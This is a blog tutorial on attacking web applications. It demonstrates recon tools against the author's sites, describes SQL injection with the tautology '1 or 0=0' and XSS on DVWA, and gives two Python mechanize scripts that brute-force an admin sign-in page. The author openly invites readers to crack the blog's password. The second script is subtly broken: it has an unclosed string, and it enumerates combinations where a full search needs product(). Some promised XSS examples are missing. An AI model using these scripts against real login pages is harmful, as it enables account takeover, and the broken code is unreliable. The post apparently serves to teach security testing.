Exploiting Web Applications
Created On 30. Apr 2020
Updated: 2021-05-01 23:44:40.875422000 +0000
Created By: acidghost
Exploiting web applications can be a lot of fun as well. Here are some simple tools that you can use to have a better idea about vulnerabilities of a web app.
whatweb gives information on a hosted app on the domain, as well on the server type, IP, and in some cases the versions of languages that support the framework.
run it like this against this blog:
# whatweb zonaincognita.com
There is some interesting, but let's check something else.
# whatweb mechaplay.com
Additionally we see the PHP and JQuery versions. And I really tried to beef it up with a lot of plugins and whatnot. Well that's WordPress for you.
is a tool for testing web application firewalls. It's built in Kali and you can launch it like this:
# wafw00f http://zonaincognita.com
this tool will help find out if a domain is using DNS or HTTP load balancing.
check this out:
# lbd www.zonaincognita.com
this tool copies a website.
Install it like this:
# sudo apt-get install httrack
# httrack "http://zonaincognita.com" -O "/tmp/httrack" -v
Careful, as this operation might consume all your memory
this tool checks the certificate details by querying the SSL services. We'll check that when SSL is properly enabled here ;)
DVWA On Metasploitable
We will check the Metasploitable system later in more detail. Meanwhile here is a short reference about its Damn Vulnerable Web App and what kind of exploits can be executed.
this type of attack injects a piece of code that alters the output of a web application that's sent to the back-end. This is called tautological injection. It is one of the most frequent types of SQL injections used. An example is 1 or 0=0, which is an unconditionally true expression that if injected in a SQL table will reveal database table rows and will bypass authentication.
Cross site scripting attacks work the following ways:
1.execute scripts from text fields on a website.
For example, if the site is prone to XSS this script pasted in to the text field and executed will pop up an alert:
2. Defacement attacks to load a website in the text box:
3. upload a malicios script if the type of uploaded files is not screened.
4. command execution - execute scripts, or see contents of files on the target system itself.
Brute forcing this blog
There is no fun without actually trying to break something, right?
I encourage you to to try to crack the password of my blog with such as the scripts below.
We are using the mechanize python module to navigate through pages and get the words from a 'password' file with a wordlist that will iterate through 'lines'.
You can similarly go with a list of emails for the email field. Now you know better why hackers steal emails and how they are being used. On the black market you can get lists of 50K email and password combinations for less than 1$. Are you there as well? I found that there have been multiple instances of my accounts pwned. Happens to all of us.
The result will be written to a txt file and the attack number will be appended at the end of filename. Never mind the long path, that's just for fun :feelsgood:
import mechanize url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in" browser = mechanize.Browser() attackNumber = 1 with open('passwords.txt') as f: for lines in f: browser.open(url) browser.select_form(nr=0) browser["admin_user[email]"] = 'my email here' browser["admin_user[password]"] = lines res = browser.submit() content = res.read() print res.code output = open('response'+str(attackNumber)+'.txt', 'w') output.write(content) output.close attackNumber += 1
Here is the same script, but in contrast, we are letting it do the work for us, assuming the password is in ascii lowercase with a length of 8 characters:
import mechanize from itertools import combinations from string import ascii_lowercase url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in" browser = mechanize.Browser() attackNumber = 1 passwords = (p for p in combinations(ascii_lowercase, 8)) for p in passwords: browser.open(url) browser.select_form(nr=0) browser["admin_user[email]"] = 'the email comes here browser["admin_user[password]"] = ''.join(p) res = browser.submit() content = res.read() print res.code output = open('response'+str(attackNumber)+'.txt', 'w') output.write(content) output.close attackNumber += 1
On successful login you will see in the response 'Signed in successfully' otherwise 'Invalid email or password'.